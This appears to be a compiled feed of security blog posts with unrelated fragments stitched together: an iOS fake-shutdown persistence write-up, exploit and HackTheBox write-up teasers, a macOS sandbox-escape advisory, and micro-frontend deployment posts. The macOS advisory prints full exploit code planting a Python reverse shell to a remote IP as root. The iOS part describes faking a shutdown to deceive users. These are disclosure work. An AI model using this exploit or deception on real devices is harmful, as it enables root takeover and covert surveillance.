“All touch events are first processed by this daemon, then translated and relayed to the iOS application in the foreground”. We found this statement to be accurate. Moreover, backboardd not only relay touch events, also physical button click events. 

backboardd logs the exact time when a button is pressed down, and when it’s been released. 

With the help from cycript, We noticed a way that allows us to intercept that event with Objective-C Method Hooking. 

A _BKButtonEventRecord instance will be created and inserted into a global dictionary object BKEventSenderUsagePairDictionary.  We hook the insertion method when the user attempts to “turn on” the phone.

The file will unleash the SpringBoard and trigger a special code block in our injected dylib. What it does is to leverage local SSH access to gain root privilege, then we execute /bin/launchctl reboot userspace. This will exit all processes and restart the system without touching the kernel. The kernel remains patched. Hence malicious code won’t have any problem continuing to run after this kind of reboot.

The user will see the Apple Logo effect upon restarting. This is handled by backboardd as well. Upon launching the SpringBoard, the backboardd lets SpringBoard take over the screen.

From that point, the interactive UI will be presented to the user. Everything feels right as all processes have indeed been restarted. Non-persistent threats achieved “persistency” without persistence exploits.

Hijacking the Force Restart Event?

A user can perform a “force restart” by clicking rapidly on “Volume Up”, then “Volume Down”, then long press on the power button until the Apple logo appears.

We have not found an easy way to hijack the force restart event. This event is implemented at a much lower level. According to the post below, it is done at a hardware level. Following a brief search in the iOS kernel, we can confirm that we didn’t see what triggers the force-restart event. The good news is that it’s harder for malicious actors to disable force restart events, but at the same time end-users face a risk of data loss as the system does not have enough time to securely write data to disk in case of force-restart events.

Misleading Force Restart

Nevertheless, It is entirely possible for malicious actors to observe the user’s attempt to perform a  force-restart (via backboardd) and deliberately make the Apple logo appear a few seconds earlier, deceiving the user into releasing the button earlier than they were supposed to. Meaning that in this case, the end-user did not successfully trigger a force-restart.  We will leave this as an exercise for the reader.

Ref: https://support.apple.com/guide/iphone/force-restart-iphone-iph8903c3ee6/ios

NoReboot Proof of Concept

You can find the source code of NoReboot POC here.

Never trust a device to be off

Since iOS 15, Apple introduced a new feature allowing users to track their phone even when it’s been turned off. Malware researcher @naehrdine wrote a technical analysis on this feature and shared her opinion on “Security and privacy impact”. We agree with her on “Never trust a device to be off, until you removed its battery or even better put it into a Blender.”

Checking if your phone is compromised

ZecOps for Mobile leverages extended data collection and enables responding to security events. If you’d like to inspect your phone – please feel free to request a free trial here.

2Q21: New Year's Reflections

31 December 2021 at 10:24

This may be the most important proposition revealed by history: “At the time, no one knew what was coming.”

― Haruki Murakami, 1Q84

1Q84 sat on my shelf gathering dust for years after I bought it during a wildly-ambitious Amazon shopping spree. I promised myself that I would get round to reading it, but college offered far more immediate distractions.

I only started reading it in 2020, when a new phase of life – my first job! – triggered a burst of enthusiasm for fresh beginnings. I moved at a brisk pace, savouring Murakami’s knack for magical prose and weird similes (“His voice was hard and dry, reminding her of a desert plant that could survive a whole year on one day’s worth of rain.”) However, as a mysterious new virus crept, then leapt across the globe, I found myself slowing down. The fantastical plot filled with Little People and Air Chrysalises and two moons began to take on a degree of verisimilitude that pulled me out of the story.

Two-thirds into the book, one of the characters, a woman/fitness instructor/assassin named Aomame, isolates herself in a small apartment for months due to reasons outside of her control. Unable to even take a single step outside, she kills time by reading Proust (In Search of Lost Time), listening to the radio, and working out. She’s lost, trying to find her way back to a sense of normalcy. It felt too real; although I only had about a hundred pages left, I put the book back on the shelf.

The most-read New York Times story in 2021 labelled the pervasive sense of ennui as “languishing” – the indeterminable void between depression and flourishing. To combat this, it suggested rediscovering one’s “flow”.

I set three big learning goals for myself this year: artificial intelligence, vulnerability research, and Internet of Things.

I was lucky enough to snag a OpenAI’s GPT-3 beta invitation, and the tinkering that ensued eventually resulted in AI-powered phishing research that I presented with my colleagues at DEF CON and Black Hat USA. WIRED magazine covered the project in thankfully fairly nuanced terms.

In the meantime, I cut my teeth on basic exploitation with Offensive Security’s Exploit Developer course, which I then applied to my research to discover fresh Apache OpenOffice and Microsoft Office code execution bugs (The Register reported on my related HacktivityCon talk). Dipping my toes into the vulnerability research reminded me just how vast this ocean is; it’ll be a long time before I can even tread water.

Finally, I trained with my colleagues in beginner IoT/OT concepts, winning the DEF CON ICS CTF. One thing I noticed about this space is the lack of good online trainings (even the in-person ones are iffy); there’s a niche market opportunity here. My vulnerability research team discovered 8 new vulnerabilities in Synology’s Network Attached Storage devices in a (failed) bid for Pwn2Own glory. Still, I made some lemonade with an upcoming talk at ShmooCon on why no one pwned Synology at Pwn2Own and TianFu Cup. Spoiler: it’s not because Synology is unhackable.

I finished 1Q84 last week. At the end of the book, Aomame escapes the dangerous alternate dimension she’s trapped in by entering yet another dimension – sadly, there’s no way home, as Spiderman will tell you. I suspect that “same same but different” feeling will carry over to 2022 – even as we emerge from the great crisis, there will be no homecoming. We will have to deal with the strange new world we have stumbled into.

Whichever dimension we may be in, here’s wishing you and your loved ones a very happy new year.

Analysis of a VMWare Guest-to-Host Escape from Pwn2Own 2017

This vulnerability was found by Keen Security Lab which they showed at Pwn2Own 2017. Unfortunately, because the bug was silently patched by VMWare in 12.5.3 no CVE number was assigned, even though the vulnerability leads to remote code execution. Summary The vulnerability affects the Drag n Drop functionality of VMWare Workstation Pro before 12.5.3. This feature allows users to copy files from the host to the guest. However, due to a few insecure backdoor calls over an RPC interface, a Use-After-Free is present.

Supervisor Mode Execution Prevention

Supervisor Mode Execution Prevention is a CPU security feature which aims to prevent execution of untrusted memory while operating at a greater privilege level. In short, it detects so-called “ring0” (kernelspace) code that is running in “ring3” (userspace). History SMEP was first introduced in 2011 by Intel on the Ivy Bridge Architecture. It was designed in order to address classes of Local privilege Escalation (LPE) sometimes also known as Escalation of Privilege (EoP) attacks.

PaX - structleak

I am rather fascinated with exploit mitigations, especially ones by PaX. When I first started out in security I came to learn of PaX quite quickly, and since moving into the binary exploitation space the desire to understand more about how these mitigations are created and how they work has greatly increased. In light of that, today I am going to looking into “STRUCTLEAK”. Introduction STRUCTLEAK is a GCC plugin created by PaX team, their decision to make such a plugin was prompted by CVE-2013-2141 (more on this CVE shortly).

Setting up PwnDbg with Ghidra

25 September 2021 at 00:00
If you’re like me and more used to Windows tooling (even if you have Linux experience) it is a little difficult to setup some of this more complicated Rizin tooling. So, thought I would make a quick guide about setting up Pwndbg with Ghidra. As a WinDbg use, despite having used gdb before it has a lot of quirks. Quirks which are as easy to get used to as quirks that exist in WinDbg.

Automatic Reference Counting

19 September 2021 at 00:00
I was bored so I decided to make a blog post on what “Automatic Reference Counting” (ARC) is and more importantly how it can act as a mitigation for Use-After-Free vulnerabilities. As well as other heap-based memory management bugs such as memory leaks. Introduction Most of you will have probably heard of garbage collection, most likely in the context of Java. Someone might have said to you before “Java garbage collection is horrible”.

HackTheBox - Jeeves Writeup

19 September 2021 at 00:00
Getting Started This challenge is pretty easy but I just thought I’d explain it in a blog post real quick since I started doing some of the HTB pwn challenges. Reverse Engineering The challenge itself is just a simple gets() buffer overflow. As you can see in the code below, it takes our name via a gets() call. printf("Hello, good sir!\nMay I have your name? "); gets(input_buffer); printf("Hello %s, hope you have a good day!

Analysis of CVE-2017-12561

In this post I am going to perform root-cause analysis of a bug reported by Steven Seeley in HP iMC 7.3 E0504P04, specifically in the “dbman” service. Steven found a Use-After-Free condition in opcode 10012. I was given this task as a challenge and I had a lot of fun. I was not totally comfortable with heap-type bugs so it was a really nice challenge to learn more about the heap.

BAE x BSides Chelt CTF

Introduction BAE hosted a CTF the day before BSides Cheltenham. I played with my friends. There was a crypto challenge which I saw a number of people struggling with. The challenge only got three solved in total, I was the first to solve it, so I thought I’d make a writeup of how I did it. The Challenge The challenge was reminiscient of the ECB penguin problem in the sense that we had two picture files in .

OSCP Experience

OSCP Experience At the time of writing I just passed my OSCP and I thought I would follow the trend and make a blog post about my experience with both the exam and the course. Disclaimer: this post is old. The OSCP has undergone many updates since I took it, please keep that in mind. PWK Experience I originally was going to purchase 60 days however, in the end I decided to purchase 30 days.

HackTheBox - Sunday Writeup

Introduction This is a writeup for the machine “Sunday” (10.10.10.76) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP We’ll start off with our usual full port nmap scan to see what kinda’ stuff is running on the box, I did also run a UDP scan too like usual however again in this case nothing was running on UDP.

HackTheBox - Beep Writeup

Introduction This is a writeup for the machine “Beep” (10.10.10.7) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP As always we start off with our full TCP port scan using NMAP - this box is running quite a lot of services but don’t let that scare you! We follow the same enumeration process so let’s not worry that its any different just because there are more ports!

HackTheBox - Bashed Writeup

Introduction This is a writeup for the machine “Bashed” (10.10.10.68) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP We start off with our two nmap scans, TCP & UDP however, in this boxes case we only got information returned on TCP so we will only analyse the output for the TCP scan in this post.

HackTheBox - Cronos Writeup

Introduction This is a writeup for the machine “Cronos” (10.10.10.13) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP Let’s start off with our two nmap scans, a full TCP & a full UDP. In this case only our TCP scan returned any results so we’re only going to analyse the output of the TCP scan.

HackTheBox - Devel Writeup

Introduction This is a writeup for the machine “Devel” (10.10.10.5) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP As usual we’re going to start off with our two nmap scans, a full TCP scan using nmap -sV -sC -p- 10.10.10.5 and nmap -sU -p- 10.10.10.5 in this case, we only returned ports open on TCP so we’re going to look at that now.

HackTheBox - Lame Writeup

Introduction This is a writeup for the machine “Lame” (10.10.10.3) on the platform HackTheBox. HackTheBox is a pentetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP The first thing we’re going to do is run an NMAP scan using the following command nmap -sV -sC -Pn -oX /tmp/webmap/lame.xml 10.10.10.3 if you’re wondering about the last flag -oX that is allowing me to output the report into an XML format, this is because I use webmap (as you can see in the /tmp/webmap) which is an awesome tool that allows me some visual aids for a box/network!

HackTheBox - Legacy Writeup

Introduction This is a writeup for the machine “Legacy” (10.10.10.4) on the platform HackTheBox. HackTheBox is a pentetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP The first thing we’re going to do is run an NMAP scan using the following command nmap -sV -sC -Pn -oX /tmp/webmap/legacy.xml 10.10.10.4 if you’re wondering about the last flag -oX that is allowing me to output the report into an XML format, this is because I use webmap (as you can see in the /tmp/webmap) which is an awesome tool that allows me some visual aids for a box/network!

Xorg LPE CVE 2018-14665

On October 25th 2018 a post was made on SecurityTracker disclosing CVE 2018-14665. The interesting thing is this CVE has two bugs in two different arguments. The first is a flaw in the -modulepath argument which could lead to arbitrary code execution. The second was a flaw in the -logfile argument which could allow arbitrary files to be deleted from the system. Both of these issues were caused by poor command line validation.

Sandbox escape + privilege escalation in StorePrivilegedTaskService

21 December 2021 at 00:00

CVE-2021-30688 is a vulnerability which was fixed in macOS 11.4 that allowed a malicious application to escape the Mac Application Sandbox and to escalate its privileges to root. This vulnerability required a strange exploitation path due to the sandbox profile of the affected service.

Background

At rC3 in 2020 and HITB Amsterdam 2021 Daan Keuper and Thijs Alkemade gave a talk on macOS local security. One of the subjects of this talk was the use of privileged helper tools and the vulnerabilities commonly found in them. To summarize, many applications install a privileged helper tool in order to install updates for the application. This allows normal (non-admin) users to install updates, which is normally not allowed due to the permissions on /Applications. A privileged helper tool is a service which runs as root which used for only a specific task that needs root privileges. In this case, this could be installing a package file.

Many applications that use such a tool contain two vulnerabilities that in combination lead to privilege escalation:

  1. Not verifying if a request to install a package comes from the main application.
  2. Not correctly verifying the authenticity of an update package.

As it turns out, the first issue not only affects third-party developers, but even Apple itself! Although in a slightly different way…

About StorePrivilegedTaskService

StorePrivilegedTaskService is a tool used by the Mac App Store to perform certain privileged operations, such as removing the quarantine flag of downloaded files, moving files and adding App Store receipts. It is an XPC service embedded in the AppStoreDaemon.framework private framework.

To explain this vulnerability, it would be best to first explain XPC services and Mach services, and the difference between those two.

First of all, XPC is an inter-process communication technology developed by Apple which is used extensively to communicate between different processes in all of Apple’s operating systems. In iOS, XPC is a private API, usable only indirectly by APIs that need to communicate with other processes. On macOS, developers can use it directly. One of the main benefits of XPC is that it sends structured data, supporting many data types such as integers, strings, dictionaries and arrays. This can in many cases avoid the use of serialization functions, which reduces the possibility of vulnerabilities due to parser bugs.

XPC services

An XPC service is a lightweight process related to another application. These are launched automatically when an application initiates an XPC connection and terminated after they are no longer used. Communication with the main process happens (of course) over XPC. The main benefit of using XPC services is the ability to separate dangerous operations or privileges, because the XPC service can have different entitlements.

For example, suppose an application needs network functionality for only one feature: to download a fixed URL. This means that when sandboxing the application, it would need full network client access (i.e. the com.apple.security.network.client entitlement). A vulnerability in this application can then also use the network access to send out arbitrary network traffic. If the functionality for performing the request would be moved to a different XPC service, then only this service would need the network permission. Compromising the main application would only allow it to retrieve that URL and compromising the XPC service would be unlikely, as it requires very little code. This pattern is how Apple uses these services throughout the system.

These services can have one of 3 possible service types:

  • Application: each application initiating a connection to an XPC service spawns a new process (though multiple connections from one application are still handled in the same process).
  • User: per user only one instance of an XPC service is running, handling requests from all applications running as that user.
  • System: only one instance of the XPC service is running and it runs as root. Only available for Apple’s own XPC services.

Mach services

While XPC services are local to an application, Mach services are accessible for XPC connections system wide by registering a name. A common way to register this name is through a launch agent or launch daemon config file. This can launch the process on demand, but the process is not terminated automatically when no longer in use, like XPC services are.

For example, some of the mach services of lsd:

/System/Library/LaunchDaemons/com.apple.lsd.plist:

<key>MachServices</key>
	<dict>
		<key>com.apple.lsd.advertisingidentifiers</key>
		<true/>
		<key>com.apple.lsd.diagnostics</key>
		<true/>
		<key>com.apple.lsd.dissemination</key>
		<true/>
		<key>com.apple.lsd.mapdb</key>
		<true/>
	...

Connecting to an XPC service using the NSXPCConnection API:

[[NSXPCConnection alloc] initWithServiceName:serviceName];

while connecting to a mach service:

[[NSXPCConnection alloc] initWithMachServiceName:name options:options];

NSXPCConnection is a higher-level Objective-C API for XPC connections. When using it, an object with a list of methods can be made available to the other end of the connection. The connecting client can call these methods just like it would call any normal Objective-C methods. All serialization of objects as arguments is handled automatically.

Permissions

XPC services in third-party applications rarely have interesting permissions to steal compared to a non-sandboxed application. Sanboxed services can have entitlements that create sandbox exceptions, for example to allow the service to access the network. Compared to a non-sandboxed application, these entitlements are not interesting to steal because the app is not sandboxed. TCC permissions are also usually set for the main application, not its XPC services (as that would generate rather confusing prompts for the end user).

A non-sandboxed application can therefore almost never gain anything by connecting to the XPC service of another application. The template for creating a new XPC service in Xcode does not even include a check on which application has connected!

This does, however, appear to give developers a false sense of security because they often do not add a permission check to Mach services either. This leads to the privileged helper tool vulnerabilities discussed in our talk. For Mach services running as root, a check on which application has connected is very important. Otherwise, any application could connect to the Mach service to request it to perform its operations.

StorePrivilegedTaskService vulnerability

Sandbox escape

The main vulnerability in the StorePrivilegedTaskService XPC service was that it did not check the application initiating the connection. This service has a service type of System, so it would launch as root.

This vulnerability was exploitable due to defense-in-depth measures which were ineffective:

  • StorePrivilegedTaskService is sandboxed, but its custom sandboxing profile is not restrictive enough.
  • For some operations, the service checked the paths passed as arguments to ensure they are a subdirectory of a specific directory. These checks could be bypassed using path traversal.

This XPC service is embedded in a framework. This means that even a sandboxed application could connect to the XPC service, by loading the framework and then connecting to the service.

[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];

The XPC service offers a number of interesting methods that can be called from the application using an NSXPCConnection. For example:

// Write a file
- (void)writeAssetPackMetadata:(NSData *)metadata toURL:(NSURL *)url withReplyHandler:(void (^)(NSError *))replyHandler;
 // Delete an item
- (void)removePlaceholderAtPath:(NSString *)path withReplyHandler:(void (^)(NSError *))replyHandler;
// Change extended attributes for a path
- (void)setExtendedAttributeAtPath:(NSString *)path name:(NSString *)name value:(NSData *)value withReplyHandler:(void (^)(NSError *))replyHandler;
// Move an item
- (void)moveAssetPackAtPath:(NSString *)path toPath:(NSString *)toPath withReplyHandler:(void (^)(NSError *))replyHandler;

A sandbox escape was quite clear: write a new application bundle, use the method -setExtendedAttributeAtPath:name:value:withReplyHandler: to remove its quarantine flag and then launch it. However, this also needs to take into account the sandbox profile of the XPC service.

The service has a custom profile. The restriction related to files and folders are:

(allow file-read* file-write*
    (require-all
        (vnode-type DIRECTORY)
        (require-any
            (literal "/Library/Application Support/App Store")
            (regex #"\.app(download)?(/Contents)?")
            (regex #"\.app(download)?/Contents/_MASReceipt(\.sb-[a-zA-Z0-9-]+)?")))
    (require-all
        (vnode-type REGULAR-FILE)
        (require-any
            (literal "/Library/Application Support/App Store/adoption.plist")
            (literal "/Library/Preferences/com.apple.commerce.plist")
            (regex #"\.appdownload/Contents/placeholderinfo")
            (regex #"\.appdownload/Icon")
            (regex #"\.app(download)?/Contents/_MASReceipt((\.sb-[a-zA-Z0-9-]+)?/receipt(\.saved)?)"))) ;covers temporary files the receipt may be named

    (subpath "/System/Library/Caches/com.apple.appstored")
    (subpath "/System/Library/Caches/OnDemandResources")
)

The intent of these rules is that this service can modify specific files in applications currently downloading from the app store, so with a .appdownload extension. For example, adding a MASReceipt file and changing the icon.

The regexes here are the most interesting, mainly because they are attached neither on the left nor right. On the left this makes sense, as the full path could be unknown, but the lack of binding it on the right (with $) is a mistake for the file regexes.

Formulated simply, we can do the following with this sandboxing profile:

  • All operations are allowed on directories containing .app anywhere in their path.
  • All operations are allowed on files containing .appdownload/Icon anywhere in their path.

By creating a specific directory structure in the temporary files directory of our sandboxed application:

bar.appdownload/Icon/

Both the sandboxed application and the StorePrivilegedTaskService have full access inside the Icon folder. Therefore, it would be possible to create a new application here and then use -setExtendedAttributeAtPath:name:value:withReplyHandler: on the executable to dequarantine it.

Privesc

This was already a nice vulnerability, but we were convinced we could escalate privileges to root as well. Having a process running as root creating new files in chosen directories with specific contents is such a powerful primitive that privilege escalation should be possible. However, the sandbox requirements on the paths made this difficult.

Creating a new launch daemon or cron jobs are common ways for privilege escalation by file creation, but the sandbox profile path requirements would only allow a subdirectory of a subdirectory of the directories for these config files, so this did not work.

An option that would work would be to modify an application. In particular, we found that Microsoft Teams would work. Teams is one of the applications that installs a launch daemon for installing updates. However, instead of copying a binary to /Library/PrivilegedHelperTools, the daemon points into the application bundle itself:

/Library/LaunchDaemons/com.microsoft.teams.TeamsUpdaterDaemon.plist

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>Label</key>
	<string>com.microsoft.teams.TeamsUpdaterDaemon</string>
	<key>MachServices</key>
	<dict>
		<key>com.microsoft.teams.TeamsUpdaterDaemon</key>
		<true/>
	</dict>
	<key>Program</key>
	<string>/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon</string>
</dict>
</plist>

The following would work for privilege escalation:

  1. Ask StorePrivilegedTaskService to move /Applications/Microsoft Teams.app somewhere else. Allowed, because the path of the directory contains .app.1
  2. Move a new app bundle to /Applications/Microsoft Teams.app, which contains a malicious executable file at Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon.
  3. Connect to the com.microsoft.teams.TeamsUpdaterDaemon Mach service.

However, a privilege escalation requiring a specific third-party application to be installed is not as convincing as a privilege escalation without this requirement, so we kept looking. The requirements are somewhat contradictory: typically anything bundled into an .app bundle runs as a normal user, not as root. In addition, the Signed System Volume on macOS Big Sur means changing any of the built-in applications is also impossible.

By an impressive and ironic coincidence, there is an application which is installed on a new macOS installation, not on the SSV and which runs automatically as root: MRT.app, the “Malware Removal Tool”. Apple has implemented a number of anti-malware mechanisms in macOS. These are all updateable without performing a full system upgrade because they might be needed quickly. This means in particular that MRT.app is not on the SSV. Most malware is removed by signature or hash checks for malicious content, MRT is the more heavy-handed solution when Apple needs to add code for performing the removal.

Although MRT.app is in an app bundle, it is not in fact a real application. At boot, MRT is run as root to check if any malware needs removing.

Our complete attack follows the following steps, from sandboxed application to code execution as root:

  1. Create a new application bundle bar.appdownload/Icon/foo.app in the temporary directory of our sandboxed application containing a malicious executable.
  2. Load the AppStoreDaemon.framework framework and connect to the StorePrivilegedTaskService XPC service.
  3. Ask StorePrivilegedTaskService to change the quarantine attribute for the executable file to allow it to launch without a prompt.
  4. Ask StorePrivilegedTaskService to move /Library/Apple/System/Library/CoreServices/MRT.app to a different location.
  5. Ask StorePrivilegedTaskService to move bar.appdownload/Icon/foo.app from the temporary directory to /Library/Apple/System/Library/CoreServices/MRT.app.
  6. Wait for a reboot.

See the full function here:

/// The bar.appdownload/Icon part in the path is needed to create files where both the sandbox profile of StorePrivilegedTaskService and the Mac AppStore sandbox of this process allow acccess.
NSString *path = [NSTemporaryDirectory() stringByAppendingPathComponent:@"bar.appdownload/Icon/foo.app"];
NSFileManager *fm = [NSFileManager defaultManager];
NSError *error = nil;

/// Cleanup, if needed.
[fm removeItemAtPath:path error:nil];

[fm createDirectoryAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS"] withIntermediateDirectories:TRUE attributes:nil error:&error];

assert(!error);

/// Create the payload. This example uses a Python reverse shell to 192.168.1.28:1337.
[@"#!/usr/bin/env python\n\nimport socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.1.28\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);" writeToFile:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] atomically:TRUE encoding:NSUTF8StringEncoding error:&error];

assert(!error);

/// Make the payload executable
[fm setAttributes:@{NSFilePosixPermissions: [NSNumber numberWithShort:0777]} ofItemAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] error:&error];

assert(!error);

/// Load the framework, so the XPC service can be resolved.
[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];
conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(StorePrivilegedTaskInterface)];
[conn resume];

/// The new file is now quarantined, because this process created it. Change the quarantine flag to something which is allowed to run.
/// Another option would have been to use the `-writeAssetPackMetadata:toURL:replyHandler` method to create an unquarantined file.
[conn.remoteObjectProxy setExtendedAttributeAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] name:@"com.apple.quarantine" value:[@"00C3;60018532;Safari;" dataUsingEncoding:NSUTF8StringEncoding] withReplyHandler:^(NSError *result) {
    NSLog(@"%@", result);

    assert(result == nil);

    srand((unsigned int)time(NULL));

    /// Deleting this directory is not allowed by the sandbox profile of StorePrivilegedTaskService: it can't modify the files inside it.
    /// However, to move a directory, the permissions on the contents do not matter.
    /// It is moved to a randomly named directory, because the service refuses if it already exists.
    [conn.remoteObjectProxy moveAssetPackAtPath:@"/Library/Apple/System/Library/CoreServices/MRT.app/" toPath:[NSString stringWithFormat:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT%d.app/", rand()]
                               withReplyHandler:^(NSError *result) {
        NSLog(@"Result: %@", result);

        assert(result == nil);

        /// Move the malicious directory in place of MRT.app.
        [conn.remoteObjectProxy moveAssetPackAtPath:path toPath:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT.app/" withReplyHandler:^(NSError *result) {
            NSLog(@"Result: %@", result);

            /// At launch, /Library/Apple/System/Library/CoreServices/MRT.app/Contents/MacOS/MRT -d is started. So now time to wait for that...
        }];
    }];
}];

Fix

Apple has pushed out a fix in the macOS 11.4 release. They implemented all 3 of the recommended changes:

  1. Check the entitlements of the process initiating the connection to StorePrivilegedTaskService.
  2. Tightened the sandboxing profile of StorePrivilegedTaskService.
  3. The path traversal vulnerabilities for the subdirectory check were fixed.

This means that the vulnerability is not just fixed, but reintroducing it later is unlikely to be exploitable again due to the improved sandboxing profile and path checks. We reported this vulnerability to Apple on January 19th, 2021 and a fix was released on May 24th, 2021.


  1. This is actually a quite interesting aspect of the macOS sandbox: to delete a directory, the process needs to have file-write-unlink permission on all of the contents, as each file in it must be deleted. To move a directory somewhere else, only permissions on the directory itself and its destination are needed! ↩︎

9. Wrapping Up Our Journey Implementing a Micro Frontend

16 December 2021 at 18:46

Wrapping Up Our Journey Implementing a Micro Frontend

We hope you now have a better understanding of how you can successfully create a micro-front end architecture. Before we call it a day, let’s give a quick recap of what was covered.

What You Learned

  • Why We implemented a micro front end architecture — You learned where we started, specifically what our architecture used to look like and where the problems existed. You then learned how we planned on solving those problems with a new architecture.
  • Introducing the Monorepo and NX — You learned how we combined two of our repositories into one: a monorepo. You then saw how we leveraged the NX framework to identify which part of the repository changed, so we only needed to rebuild that portion.
  • Introducing Module Federation — You learned how we leverage webpacks module federation to break our main application into a series of smaller applications called micro-apps, the purpose of which was to build and deploy these applications independently of one another.
  • Module Federation — Managing Your Micro-Apps — You learned how we consolidated configurations and logic pertaining to our micro-apps so we could easily manage and serve them as our codebase continued to grow.
  • Module Federation — Sharing Vendor Code — You learned the importance of sharing vendor library code between applications and some related best practices.
  • Module Federation — Sharing Library Code — You learned the importance of sharing custom library code between applications and some related best practices.
  • Building and Deploying — You learned how we build and deploy our application using this new model.

Key Takeaways

If you take anything away from this series, let it be the following:

The Earlier, The Better

We can tell you from experience that implementing an architecture like this is much easier if you have the opportunity to start from scratch. If you are lucky enough to start from scratch when building out an application and are interested in a micro-frontend, laying the foundation before anything else is going to make your development experience much better.

Evaluate Before You Act

Before you decide on an architecture like this, make sure it’s really what you want. Take the time to assess your issues and how your company operates. Without company support, pulling off this approach is extremely difficult.

Only Build What Changed

Using a tool like NX is critical to a monorepo, allowing you to only rebuild those parts of the system that were impacted by a change.

Micro-front Ends Are Not For Everyone

We know this type of architecture is not for everyone, and you should truly consider what your organization needs before going down this path. However, it has been very rewarding for us, and has truly transformed how we deliver solutions to our customers.

Don’t Forget To Share

When it comes to module federation, sharing is key. Learning when and how to share code is critical to the successful implementation of this architecture.

Be Careful Of What You Share

Sharing things like state between your micro-apps is a dangerous thing in a micro-frontend architecture. Learning to put safeguards in place around these areas is critical, as well as knowing when it might be necessary to deploy all your applications at once.

Summary

We hope you enjoyed this series and learned a thing or two about the power of NX and module federation. If this article can help just one engineer avoid a mistake we made, then we’ll have done our job. Happy coding!


9. Wrapping Up Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

8. Building & Deploying

16 December 2021 at 18:45

Building & Deploying

This is post 8 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article documents the final phase of our new architecture where we build and deploy our application utilizing our new micro-frontend model.

The Problem

If you have followed along up until this point, you can see how we started with a relatively simple architecture. Like a lot of companies, our build and deployment flow looked something like this:

  1. An engineer merges their code to master.
  2. A Jenkins build is triggered that lints, tests, and builds the entire application.
  3. The built application is then deployed to a QA environment.
  4. End-2-End (E2E) tests are run against the QA environment.
  5. The application is deployed to production. If it’s a CICD flow this occurs automatically if E2E tests pass, otherwise this would be a manual deployment.

In our new flow this would no longer work. In fact, one of our biggest challenges in implementing this new architecture was in setting up the build and deployment process to transition from a single build (as demonstrated above) to multiple applications and libraries.

The Solution

Our new solution involved three primary Jenkins jobs:

  1. Seed Job — Responsible for identifying what applications/libraries needed to be rebuilt (via the nx affected command). Once this was determined, its primary purpose was to then kick off n+ of the next two jobs discussed.
  2. Library Job — Responsible for linting and testing any library workspace that was impacted by a change.
  3. Micro-App Jobs — A series of jobs pertaining to each micro-app. Responsible for linting, testing, building, and deploying the micro-app.

With this understanding in place, let’s walk through the steps of the new flow:

Phase 1 — In our new flow, phase 1 includes building and deploying the code to our QA environments where it can be properly tested and viewed by our various internal stakeholders (engineers, quality assurance, etc.):

  1. An engineer merges their code to master. In the diagram below, an engineer on Team 3 merges some code that updates something in their application (Application C).
  2. The Jenkins seed job is triggered, and it identifies what applications and libraries were impacted by this change. This job now kicks off an entirely independent pipeline related to the updated application. In this case, it kicked off the Application C pipeline in Jenkins.
  3. The pipeline now lints, tests, and builds Application C. It’s important to note here how it’s only dealing with a piece of the overall application. This greatly improves the overall build times and avoids long queues of builds waiting to run.
  4. The built application is then deployed to the QA environments.
  5. End-2-End (E2E) tests are run against the QA environments.
  6. Our deployment is now complete. For our purposes, we felt that a manual deployment to production was a safe approach for us and one that still offered us the flexibility and efficiency we needed.
Phase 1 Highlighted — Deploying to QA environments

Phase 2 — This phase (shown in the diagram after the dotted line) occurred when an engineer was ready to deploy their code to production:

  1. An engineer deployed their given micro-app to staging. In this case, the engineer would go into the build for Application C and deploy from there.
  2. For our purposes, we deployed to a staging environment before production to perform a final spot check on our application. In this type of architecture, you may only encounter a bug related to the decoupled nature of your micro-apps. You can read more about this type of issue in the previous article under the Sharing State/Storage/Theme section. This final staging environment allowed us to catch these issues before they made their way to production.
  3. The application is then deployed to production.
